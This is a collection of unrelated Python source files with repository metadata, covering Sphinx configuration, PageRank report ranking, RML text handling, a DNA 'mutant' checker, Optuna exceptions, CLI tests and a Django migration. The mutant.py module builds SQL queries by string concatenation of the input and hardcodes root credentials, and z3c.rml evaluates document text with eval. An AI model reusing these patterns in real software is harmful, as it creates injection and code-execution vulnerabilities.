2020-02-22T16:39:27.000Z
|
# -*- coding: utf-8 -*-
#
# Yael documentation build configuration file, created by
# sphinx-quickstart on Fri Aug 5 14:37:23 2011.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.pngmath']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Yael'
copyright = u'2010-2013, Herve Jegou & Matthijs Douze'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = 'VVV'
# The full version, including alpha/beta/rc tags.
release = 'VVV'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
#html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'Yaeldoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'Yael.tex', u'Yael Documentation',
u'Herve Jegou \\& Matthijs Douze', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'yael', u'Yael Documentation',
[u'Herve Jegou & Matthijs Douze'], 1)
]
| 32.243119
| 80
| 0.718025
|
d3c73254200c57aacf94167e803ddb81032531df
| 5,807
|
py
|
Python
|
code_original/10_sort_supplementary_item.py
|
WuYff/CTRAS
|
22941f20f5ddc00849c7ea08cd8395defcaf3344
|
[
"MIT"
] | 1
|
2020-07-10T06:24:58.000Z
|
2020-07-10T06:24:58.000Z
|
code_original/10_sort_supplementary_item.py
|
WuYff/CTRAS
|
22941f20f5ddc00849c7ea08cd8395defcaf3344
|
[
"MIT"
] | 1
|
2020-12-23T08:03:11.000Z
|
2020-12-23T08:03:11.000Z
|
code_original/10_sort_supplementary_item.py
|
WuYff/CTRAS
|
22941f20f5ddc00849c7ea08cd8395defcaf3344
|
[
"MIT"
] | 2
|
2020-09-10T07:26:04.000Z
|
2020-10-19T07:11:13.000Z
|
#-*- coding:utf-8 -*-
import os
import numpy as np
from scipy.spatial import distance
from variables import POS_TAGS, APPS
from variables import DUPLICATES_CLUSTER_PATH, DUPLICATES_CLUSTER_IMG_PATH
from util_db import select_cluster_combine_tag
from util_db import select_cluster_id_txt, select_cluster_id_img
from util_db import select_cluster_txt_tag, select_cluster_img_tag
from util_db import insert_top_txt_into_sql, insert_top_img_into_sql
from util_hist import read_hist_img, get_img_pos
from util_hist import preprocess_line
from util_pagerank import graphMove, firstPr, pageRank
# ---------------------------------------------------------------------------------------
# Description : Function to sort the sentences/screenshots within each supplementary and save them to database
# ---------------------------------------------------------------------------------------
def distance_sentence_jaccard(sentence_a,sentence_b):
inter = 0
union = 0
for word_a in sentence_a:
if word_a in sentence_b:
inter = inter + 1
union = len(sentence_a) + len(sentence_b) - inter
return 1 - (inter*1.0)/(union*1.0)
def distance_img(app,img_name_a,img_name_b):
hist_img = read_hist_img(app)
index_a = get_img_pos(img_name_a)
index_b = get_img_pos(img_name_b)
img_a = hist_img[index_a]
img_b = hist_img[index_b]
dis = distance.euclidean(img_a, img_b)
return dis
def processing(sentence_list):
line_list = []
for line in sentence_list:
if line == '':
break
line = preprocess_line(line)
words = [x.split('_') for x in line.split(' ')]
line_list.append(words)
return line_list
def calculate_txt_pr_matrix(diff_sentence_list):
pr_matrix = []
for sentence_a in diff_sentence_list:
weight_list = []
for sentence_b in diff_sentence_list:
distance = distance_sentence_jaccard(sentence_a, sentence_b)
weight = 1 - distance
weight_list.append(weight)
distance = 0
weight = 0
pr_matrix.append(weight_list)
return pr_matrix
def calculate_img_pr_matrix(app,diff_img_list):
pr_matrix = []
for img_a in diff_img_list:
weight_list = []
for img_b in diff_img_list:
distance = distance_img(app, img_a, img_b)
weight = 1 - distance
weight_list.append(weight)
distance = 0
weight = 0
pr_matrix.append(weight_list)
return pr_matrix
def get_txt_pagerank(diff_sentence_list):
pr_matrix = calculate_txt_pr_matrix(diff_sentence_list)
a_matrix = np.array(pr_matrix)
M = graphMove(a_matrix)
pr = firstPr(M)
p = 0.8
re = pageRank(p,M,pr)
return re
def get_img_pagerank(diff_img_list):
pr_matrix = calculate_img_pr_matrix(app, diff_img_list)
a_matrix = np.array(pr_matrix)
M = graphMove(a_matrix)
pr = firstPr(M)
p = 0.8
re = pageRank(p,M,pr)
return re
def calculate_cluster_txt_pr(app):
for group_id in sorted(os.listdir('/'.join([DUPLICATES_CLUSTER_PATH, app]))):
cluster_combine_tags = select_cluster_combine_tag(group_id, app)
for cluster_combine_tag in cluster_combine_tags:
cluster_ids = select_cluster_id_txt(cluster_combine_tag[0], group_id, app)
for cluster_id_ in cluster_ids:
cluster_id = cluster_id_[0]
if cluster_id != None: # contain textual candidate cluster
cluster_txt = select_cluster_txt_tag(cluster_id, group_id, app)
diff_sentence_list = []
report_id_list = []
diff_sentence_index_list = []
for cluster_info in cluster_txt:
diff_sentence_list.append(cluster_info[0])
report_id_list.append(cluster_info[1])
diff_sentence_index_list.append(cluster_info[2])
if len(diff_sentence_list) > 1:
diff_sentence_list_process = processing(diff_sentence_list)
pr = get_txt_pagerank(diff_sentence_list_process)
pr_dict = {}
flag1 = 0
for tmp in pr:
pr_dict[str(flag1)] = tmp[0]
flag1 = flag1 + 1
top_n = 0
for key,value in sorted(pr_dict.iteritems(), key=lambda d:d[1], reverse = True):
txts = (str(top_n), diff_sentence_list[int(key)], report_id_list[int(key)], diff_sentence_index_list[int(key)])
insert_top_txt_into_sql(app, group_id, cluster_combine_tag[0], txts)
top_n = top_n + 1
if len(diff_sentence_list) == 1: # there is only one sentence
txts = ('0', diff_sentence_list[0], report_id_list[0], diff_sentence_index_list[0])
insert_top_txt_into_sql(app, group_id, cluster_combine_tag[0], txts)
def calculate_cluster_img_pr(app):
for group_id in sorted(os.listdir('/'.join([DUPLICATES_CLUSTER_IMG_PATH, app]))):
cluster_combine_tags = select_cluster_combine_tag(group_id, app)
for cluster_combine_tag in cluster_combine_tags:
cluster_ids = select_cluster_id_img(cluster_combine_tag[0], group_id,app)
for cluster_id_ in cluster_ids:
cluster_id = cluster_id_[0]
if cluster_id != None: # contain image candidate cluster
cluster_img = select_cluster_img_tag(cluster_id, group_id, app)
diff_img_list = []
report_id_list = []
for cluster_info in cluster_img:
diff_img_list.append(cluster_info[0])
report_id_list.append(cluster_info[1])
if len(diff_img_list) > 1:
pr = get_img_pagerank(diff_img_list)
pr_dict = {}
flag1 = 0
for tmp in pr:
pr_dict[str(flag1)] = tmp[0]
flag1 = flag1 + 1
top_n = 0
for key,value in sorted(pr_dict.iteritems(), key=lambda d:d[1], reverse = True):
imgs = []
imgs = (str(top_n), diff_img_list[int(key)], report_id_list[int(key)])
insert_top_img_into_sql(app,group_id,cluster_combine_tag[0],imgs)
top_n = top_n + 1
if len(diff_img_list) == 1: # there is only one image
imgs = ('0', diff_img_list[0], report_id_list[0])
insert_top_img_into_sql(app,group_id,cluster_combine_tag[0],imgs)
for app in APPS:
calculate_cluster_txt_pr(app)
calculate_cluster_img_pr(app)
| 34.981928
| 118
| 0.711038
|
f7c510b35642455d7411165a157bdfbdad5b9092
| 3,643
|
py
|
Python
|
src/z3c/rml/special.py
|
a-palchikov/z3c.rml
|
7da1adb8fe1d0126fe217d2002f4796bb2f76a2e
|
[
"ZPL-2.1"
] | null | null | null |
src/z3c/rml/special.py
|
a-palchikov/z3c.rml
|
7da1adb8fe1d0126fe217d2002f4796bb2f76a2e
|
[
"ZPL-2.1"
] | null | null | null |
src/z3c/rml/special.py
|
a-palchikov/z3c.rml
|
7da1adb8fe1d0126fe217d2002f4796bb2f76a2e
|
[
"ZPL-2.1"
] | null | null | null |
##############################################################################
#
# Copyright (c) 2007 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Special Element Processing
"""
import six
from z3c.rml import attr, directive, interfaces
class IName(interfaces.IRMLDirectiveSignature):
"""Defines a name for a string."""
id = attr.String(
title=u'Id',
description=u'The id under which the value will be known.',
required=True)
value = attr.Text(
title=u'Value',
description=u'The text that is displayed if the id is called.',
required=True)
class Name(directive.RMLDirective):
signature = IName
def process(self):
id, value = self.getAttributeValues(valuesOnly=True)
manager = attr.getManager(self)
manager.names[id] = value
class IAlias(interfaces.IRMLDirectiveSignature):
"""Defines an alias for a given style."""
id = attr.String(
title=u'Id',
description=u'The id as which the style will be known.',
required=True)
value = attr.Style(
title=u'Value',
description=u'The style that is represented.',
required=True)
class Alias(directive.RMLDirective):
signature = IAlias
def process(self):
id, value = self.getAttributeValues(valuesOnly=True)
manager = attr.getManager(self)
manager.styles[id] = value
class TextFlowables(object):
def _getManager(self):
if hasattr(self, 'manager'):
return self.manager
else:
return attr.getManager(self)
def getPageNumber(self, elem, canvas):
return six.text_type(
canvas.getPageNumber() + int(elem.get('countingFrom', 1)) - 1
)
def getName(self, elem, canvas):
return self._getManager().get_name(
elem.get('id'),
elem.get('default')
)
def evalString(self, elem, canvas):
return do_eval(self._getText(elem, canvas, False))
def namedString(self, elem, canvas):
self._getManager().names[elem.get('id')] = self._getText(
elem, canvas, include_final_tail=False
)
return u''
def name(self, elem, canvas):
self._getManager().names[elem.get('id')] = elem.get('value')
return u''
handleElements = {'pageNumber': getPageNumber,
'getName': getName,
'evalString': evalString,
'namedString': namedString,
'name': name}
def _getText(self, node, canvas, include_final_tail=True):
text = node.text or u''
for sub in node.getchildren():
if sub.tag in self.handleElements:
text += self.handleElements[sub.tag](self, sub, canvas)
else:
self._getText(sub, canvas)
text += sub.tail or u''
if include_final_tail:
text += node.tail or u''
return text
def do_eval(value):
# Maybe still not safe
value = value.strip()
if value:
return six.text_type(eval(value.strip(), {'__builtins__': None}, {}))
return u''
| 30.613445
| 78
| 0.589075
|
306ba68a7e2da86203d02505b99a852eafc507d0
| 6,687
|
py
|
Python
|
api/mutant.py
|
jotamaggids/flask_meli_exercise
|
e9a12a93f7c9cb621ff3c367f8c5dba513132ecb
|
[
"MIT"
] | null | null | null |
api/mutant.py
|
jotamaggids/flask_meli_exercise
|
e9a12a93f7c9cb621ff3c367f8c5dba513132ecb
|
[
"MIT"
] | null | null | null |
api/mutant.py
|
jotamaggids/flask_meli_exercise
|
e9a12a93f7c9cb621ff3c367f8c5dba513132ecb
|
[
"MIT"
] | null | null | null |
import mysql.connector
import numpy as np
import sys
class Mutant:
def __init__(self, dna_chain):
self.dna_chain = dna_chain
@staticmethod
def get_dna(dna_chain):
config = {
'user': 'root',
'password': 'root',
'host': 'mysql',
'port': '3306',
'database': 'db_dna'
}
connection = mysql.connector.connect(**config)
cursor = connection.cursor(buffered=True, dictionary=True)
query = 'SELECT * FROM dna_data WHERE dna="' + dna_chain + '"'
result = cursor.execute(query)
if cursor.rowcount == 1:
records = cursor.fetchall()
cursor.close()
connection.close()
return {'result': True, 'status': records[0]['dna_status']}
else:
cursor.close()
connection.close()
return {'result': False, 'status': 3}
# Value to get the row or the given columns of the matrix data and check if is mutant or if not the diagonal is it.
# Value that recive
@staticmethod
def get_row_and_columns_data(data, dna_matrix, type):
i = 0
# Iterate over the letter inside data variable, example of data: ['A' 'T' 'G' 'C' 'G' 'A']
while len(data) > i:
result = Mutant.check_mutant(data, i)
if result:
return True
elif i == 2:
break
elif type == 'rows':
result = Mutant.check_mutant_diagonal(i, dna_matrix)
i = 1 + i
return False
@staticmethod
# Function to create a matrix from a list
def convert_list_to_matrix(dna_chain):
new_matrix_dna = []
for dna in dna_chain:
single_dna = []
for letter in dna:
new_letter = letter
single_dna.append(new_letter)
new_matrix_dna.append(single_dna)
return new_matrix_dna
@staticmethod
# Function to check if the chain is mutant or not
def check_mutant(chain, i):
if np.all(chain[i:4 + i] == chain[i]):
return True
else:
return False
def create_dna_chain(self):
dna = self.dna_chain
dna_matrix = Mutant.convert_list_to_matrix(dna)
dna_numpy_matrix = np.asarray(dna_matrix)
result = Mutant.check_mutant_rows(dna_numpy_matrix)
if result:
return True
else:
result = Mutant.check_mutant_columns(dna_numpy_matrix)
if result:
return True
return False
# Funcion que itera por la matriz via a la fila
@staticmethod
def check_mutant_rows(dna_matrix):
i = 0
while 6 > i:
result = Mutant.get_row_and_columns_data(dna_matrix[i], dna_matrix[i:, :], 'rows')
if result:
return True
break
i = 1 + i
return False
# Funcion que itera por la matriz a traves de las columnas de la misma
@staticmethod
def check_mutant_columns(dna_matrix):
i = 0
while 6 > i:
result = Mutant.get_row_and_columns_data(dna_matrix[:, i], dna_matrix[i:, :], 'columns')
if result:
return True
break
i = 1 + i
return False
# Funcion que toma la matriz y saca la diagonal a partir de la posicion de la misma
@staticmethod
def check_mutant_diagonal(i, dna_matrix):
diagonal = dna_matrix.diagonal(i)
if len(diagonal) > 3:
result = Mutant.check_mutant(diagonal, i)
if result:
return True
return False
# Function to validate that all the chain have all the characters and the exact length
def validate_adn_chain(self):
dna_join = ''.join(self.dna_chain)
list_dna = list(dna_join)
result = Mutant.validate_lenght(list_dna)
if result:
result = Mutant.validate_letters(list_dna)
if result:
return True
return False
@staticmethod
def validate_lenght(list_dna):
try:
if len(list_dna) % 6 == 0:
return True
else:
return False
except Exception as e:
print(e)
return False
@staticmethod
def validate_letters(list_dna):
dna_ch = ('A', 'C', 'G', 'T')
try:
for ch in list_dna:
if ch not in dna_ch:
return False
break
else:
return True
except Exception as e:
print(e)
return False
#Llama a la consulta de la BD para ver si existe o no el ADN
def validate_exist_dna(self):
dna_join = ''.join(self.dna_chain)
result = Mutant.get_dna(dna_join)
# devuelve si existe y en tal caso si es mutante o no
if result['result']:
return result
else:
return result
def save_dna(self, dna_status):
dna_join = ''.join(self.dna_chain)
config = {
'user': 'root',
'password': 'root',
'host': 'mysql',
'port': '3306',
'database': 'db_dna'
}
connection = mysql.connector.connect(**config)
cursor = connection.cursor(buffered=True, dictionary=True)
query = "INSERT INTO db_dna.dna_data( dna, dna_status, created_at) VALUES ('" + dna_join + "','" + str(dna_status) + "', now())"
result = cursor.execute(query)
connection.commit()
cursor.close()
connection.close()
return True
def return_dna_list(self):
config = {
'user': 'root',
'password': 'root',
'host': 'mysql',
'port': '3306',
'database': 'db_dna'
}
connection = mysql.connector.connect(**config)
cursor = connection.cursor(buffered=True, dictionary=True)
query = 'SELECT SUM(dna_status = 1) AS dna_status_mutant, SUM(dna_status = 0) AS dna_status_human ' \
'FROM db_dna.dna_data WHERE dna_status = 0 OR dna_status = 1'
result = cursor.execute(query)
if cursor.rowcount == 1:
records = cursor.fetchall()
cursor.close()
connection.close()
return {'result': True, 'dna_status_human': records[0]['dna_status_human'], 'dna_status_mutant': records[0]['dna_status_mutant']}
else:
cursor.close()
connection.close()
return {'result': False, 'status': 3}
| 32.619512
| 141
| 0.54748
|
5b42821bc6f6736a5fead95c15d632157f75d817
| 2,442
|
py
|
Python
|
optuna/exceptions.py
|
thigm85/optuna
|
4680f36a470ffb9ead89abf65dcc7e7533fd789f
|
[
"MIT"
] | 1
|
2019-05-28T07:29:49.000Z
|
2019-05-28T07:29:49.000Z
|
optuna/exceptions.py
|
nabenabe0928/optuna
|
aa505125de8515518fe19ba227edf7a1d3f8ebda
|
[
"MIT"
] | null | null | null |
optuna/exceptions.py
|
nabenabe0928/optuna
|
aa505125de8515518fe19ba227edf7a1d3f8ebda
|
[
"MIT"
] | 2
|
2020-03-03T00:40:28.000Z
|
2021-01-28T11:54:32.000Z
|
class OptunaError(Exception):
"""Base class for Optuna specific errors."""
pass
class TrialPruned(OptunaError):
"""Exception for pruned trials.
This error tells a trainer that the current :class:`~optuna.trial.Trial` was pruned. It is
supposed to be raised after :func:`optuna.trial.Trial.should_prune` as shown in the following
example.
See also:
:class:`optuna.TrialPruned` is an alias of :class:`optuna.exceptions.TrialPruned`.
Example:
.. testcode::
import numpy as np
from sklearn.datasets import load_iris
from sklearn.linear_model import SGDClassifier
from sklearn.model_selection import train_test_split
import optuna
X, y = load_iris(return_X_y=True)
X_train, X_valid, y_train, y_valid = train_test_split(X, y)
classes = np.unique(y)
def objective(trial):
alpha = trial.suggest_uniform('alpha', 0.0, 1.0)
clf = SGDClassifier(alpha=alpha)
n_train_iter = 100
for step in range(n_train_iter):
clf.partial_fit(X_train, y_train, classes=classes)
intermediate_value = clf.score(X_valid, y_valid)
trial.report(intermediate_value, step)
if trial.should_prune():
raise optuna.TrialPruned()
return clf.score(X_valid, y_valid)
study = optuna.create_study(direction='maximize')
study.optimize(objective, n_trials=20)
"""
pass
class CLIUsageError(OptunaError):
"""Exception for CLI.
CLI raises this exception when it receives invalid configuration.
"""
pass
class StorageInternalError(OptunaError):
"""Exception for storage operation.
This error is raised when an operation failed in backend DB of storage.
"""
pass
class DuplicatedStudyError(OptunaError):
"""Exception for a duplicated study name.
This error is raised when a specified study name already exists in the storage.
"""
pass
class ExperimentalWarning(Warning):
"""Experimental Warning class.
This implementation exists here because the policy of `FutureWarning` has been changed
since Python 3.7 was released. See the details in
https://docs.python.org/3/library/warnings.html#warning-categories.
"""
pass
| 26.835165
| 97
| 0.63923
|
4257ec826e4e2b82d80e6baadc4d1e33cc112748
| 365
|
py
|
Python
|
src/biome/text/training_results.py
|
ignacioct/biome-text
|
e4eab5fd4ea9115bd600f61e97429977053da2a5
|
[
"Apache-2.0"
] | null | null | null |
src/biome/text/training_results.py
|
ignacioct/biome-text
|
e4eab5fd4ea9115bd600f61e97429977053da2a5
|
[
"Apache-2.0"
] | null | null | null |
src/biome/text/training_results.py
|
ignacioct/biome-text
|
e4eab5fd4ea9115bd600f61e97429977053da2a5
|
[
"Apache-2.0"
] | null | null | null |
from dataclasses import dataclass
from typing import Any
from typing import Dict
@dataclass()
class TrainingResults:
"""
Training results data class
Attributes
----------
model_path: `str`
The trained model path
metrics: `Dict[str, Any]`
Related training metrics
"""
model_path: str
metrics: Dict[str, Any]
| 15.869565
| 33
| 0.638356
|
1b6534b7a0fee5040cfda8f240a831fe5c2c87e4
| 7,434
|
py
|
Python
|
tests/cli/test_cmd_turtle_canon.py
|
CasperWA/turtle-canon
|
6dce3121ff8c1c92b2428b49d82d69e4d8b0058e
|
[
"MIT"
] | null | null | null |
tests/cli/test_cmd_turtle_canon.py
|
CasperWA/turtle-canon
|
6dce3121ff8c1c92b2428b49d82d69e4d8b0058e
|
[
"MIT"
] | 42
|
2021-12-02T17:39:44.000Z
|
2022-03-30T06:39:59.000Z
|
tests/cli/test_cmd_turtle_canon.py
|
CasperWA/turtle-canon
|
6dce3121ff8c1c92b2428b49d82d69e4d8b0058e
|
[
"MIT"
] | null | null | null |
"""Test `turtle_canon.cli.cmd_turtle_canon` aka. the `turtle-canon` CLI."""
from pathlib import Path
from typing import TYPE_CHECKING
if TYPE_CHECKING:
from subprocess import CalledProcessError, CompletedProcess
from typing import List, Union
from .conftest import CLIOutput, CLIRunner
CLIRunnerOutput = Union[CalledProcessError, CLIOutput, CompletedProcess]
def test_version(clirunner: "CLIRunner") -> None:
"""Test `--version`."""
from turtle_canon import __version__
output: "CLIRunnerOutput" = clirunner(["--version"])
assert output.stdout == f"Turtle Canon version {__version__}\n"
def test_absolute_path(clirunner: "CLIRunner", simple_turtle_file: Path) -> None:
"""Simple test run with minimalistic Turtle file."""
output: "CLIRunnerOutput" = clirunner([str(simple_turtle_file)])
assertion_help = (
f"STDOUT: {output.stdout}\nSTDERR: {output.stderr}\nRETURN_CODE: "
f"{output.returncode}"
)
assert not output.stderr, assertion_help
assert output.stdout, assertion_help
assert output.returncode == 0, assertion_help
assert "Successful" in output.stdout, assertion_help
def test_relative_path(clirunner: "CLIRunner", simple_turtle_file: Path) -> None:
"""Simple test run with minimalistic Turtle file."""
relative_path = simple_turtle_file.relative_to("/tmp")
assert str(relative_path) == str(
Path(simple_turtle_file.parent.name) / simple_turtle_file.name
)
assert not relative_path.is_absolute()
output: "CLIRunnerOutput" = clirunner([str(relative_path)], run_dir="/tmp")
assertion_help = (
f"STDOUT: {output.stdout}\nSTDERR: {output.stderr}\nRETURN_CODE: "
f"{output.returncode}"
)
assert not output.stderr, assertion_help
assert output.stdout, assertion_help
assert output.returncode == 0, assertion_help
assert "Successful" in output.stdout, assertion_help
def test_non_existant_file(clirunner: "CLIRunner") -> None:
"""Ensure an error is printed with error code != 0 if the passed file does not
exist."""
non_existant_file = Path(__file__).resolve().parent / "non-existant.ttl"
assert (
not non_existant_file.exists()
), f"{non_existant_file} was expected to not exist, but suprisingly it does !"
error_substring = f"Supplied file {non_existant_file.absolute()} not found."
output: "CLIRunnerOutput" = clirunner(
[str(non_existant_file)], expected_error=error_substring
)
assertion_help = (
f"STDOUT: {output.stdout}\nSTDERR: {output.stderr}\nRETURN_CODE: "
f"{output.returncode}"
)
assert output.stderr, assertion_help
assert (
error_substring in output.stderr and error_substring not in output.stdout
), assertion_help
assert output.returncode == 1, assertion_help
assert "ERROR" in output.stderr, assertion_help
assert "Successful" not in output.stdout, assertion_help
def test_empty_file(clirunner: "CLIRunner", tmp_dir: Path) -> None:
"""Ensure a warning is printed with error code != 0 if the passed file does not
exist."""
empty_file = tmp_dir / "empty.ttl"
empty_file.touch()
assert (
empty_file.exists()
), f"{empty_file} was expected to exist, but suprisingly it does not !"
assert (
empty_file.read_text() == ""
), f"{empty_file} was expected to be empty, but suprisingly it is not !"
warning_substring = f"The Turtle file {empty_file.absolute()} is empty."
output: "CLIRunnerOutput" = clirunner([str(empty_file)])
assertion_help = (
f"STDOUT: {output.stdout}\nSTDERR: {output.stderr}\nRETURN_CODE: "
f"{output.returncode}"
)
assert output.stderr, assertion_help
assert (
warning_substring in output.stderr and warning_substring not in output.stdout
), assertion_help
assert output.returncode == 0
assert "WARNING" in output.stderr, assertion_help
assert "Successful" not in output.stdout, assertion_help
def test_multiple_files(
clirunner: "CLIRunner", single_turtle_permutations: "List[Path]"
) -> None:
"""Ensure passing multiple files to the CLI works."""
output: "CLIRunnerOutput" = clirunner([str(_) for _ in single_turtle_permutations])
assertion_help = (
f"STDOUT: {output.stdout}\nSTDERR: {output.stderr}\nRETURN_CODE: "
f"{output.returncode}"
)
assert not output.stderr, assertion_help
assert not output.stderr, assertion_help
assert output.returncode == 0
assert "Successful" in output.stdout, assertion_help
for filename in single_turtle_permutations:
assert str(filename) in output.stdout, assertion_help
def test_fail_fast(
clirunner: "CLIRunner", single_turtle_permutations: "List[Path]", tmp_dir: Path
) -> None:
"""Test `--fail-fast`."""
from copy import deepcopy
warning_file = tmp_dir / "empty.ttl"
warning_file.touch()
assert (
warning_file.exists()
), f"{warning_file} was expected to exist, but suprisingly it does not !"
assert (
warning_file.read_text() == ""
), f"{warning_file} was expected to be empty, but suprisingly it is not !"
error_file = tmp_dir / "non_existant.ttl"
assert (
not error_file.exists()
), f"{error_file} was expected to not exist, but suprisingly it does !"
assert len(single_turtle_permutations) == 3
original_single_turtle_permutation = deepcopy(single_turtle_permutations)
single_turtle_permutations.insert(1, error_file)
single_turtle_permutations.insert(-1, warning_file)
single_turtle_permutations.insert(-1, error_file)
error_substring = f"Supplied file {error_file.absolute()} not found."
output: "CLIRunnerOutput" = clirunner(
[str(_) for _ in single_turtle_permutations],
expected_error=error_substring,
)
assertion_help = (
f"STDOUT: {output.stdout}\nSTDERR: {output.stderr}\nRETURN_CODE: "
f"{output.returncode}"
)
assert output.stderr, assertion_help
assert (
error_substring in output.stderr and error_substring not in output.stdout
), assertion_help
assert output.returncode == 1, assertion_help
assert "ERROR" in output.stderr, assertion_help
assert "*" in output.stderr, assertion_help
assert output.stdout, assertion_help
assert "Successful" not in output.stdout, assertion_help
for filename in original_single_turtle_permutation:
assert str(filename) in output.stdout, assertion_help
for filename in set(single_turtle_permutations) - set(
original_single_turtle_permutation
):
assert str(filename) not in output.stdout, assertion_help
output: "CLIRunnerOutput" = clirunner(
["--fail-fast"] + [str(_) for _ in single_turtle_permutations],
expected_error=error_substring,
)
assertion_help = (
f"STDOUT: {output.stdout}\nSTDERR: {output.stderr}\nRETURN_CODE: "
f"{output.returncode}"
)
assert output.stderr, assertion_help
assert (
error_substring in output.stderr and error_substring not in output.stdout
), assertion_help
assert output.returncode == 1, assertion_help
assert "ERROR" in output.stderr, assertion_help
assert "*" not in output.stderr, assertion_help
assert not output.stdout, assertion_help
assert "Successful" not in output.stdout, assertion_help
| 35.569378
| 87
| 0.703255
|
224248e1859c0a0b3e2507a16cbf950cc50e35cf
| 608
|
py
|
Python
|
taiga/users/migrations/0017_auto_20160208_1751.py
|
threefoldtech/Threefold-Circles
|
cbc433796b25cf7af9a295af65d665a4a279e2d6
|
[
"Apache-2.0"
] | 1
|
2017-05-29T19:01:06.000Z
|
2017-05-29T19:01:06.000Z
|
docker-images/taigav2/taiga-back/taiga/users/migrations/0017_auto_20160208_1751.py
|
mattcongy/itshop
|
6be025a9eaa7fe7f495b5777d1f0e5a3184121c9
|
[
"MIT"
] | 12
|
2019-11-25T14:08:32.000Z
|
2021-06-24T10:35:51.000Z
|
taiga/users/migrations/0017_auto_20160208_1751.py
|
threefoldtech/Threefold-Circles
|
cbc433796b25cf7af9a295af65d665a4a279e2d6
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('users', '0016_auto_20160204_1050'),
]
operations = [
migrations.AlterModelOptions(
name='role',
options={'ordering': ['order', 'slug'], 'verbose_name': 'role', 'verbose_name_plural': 'roles'},
),
migrations.AlterModelOptions(
name='user',
options={'ordering': ['username'], 'verbose_name': 'user', 'verbose_name_plural': 'users'},
),
]
| 26.434783
| 108
| 0.592105
|
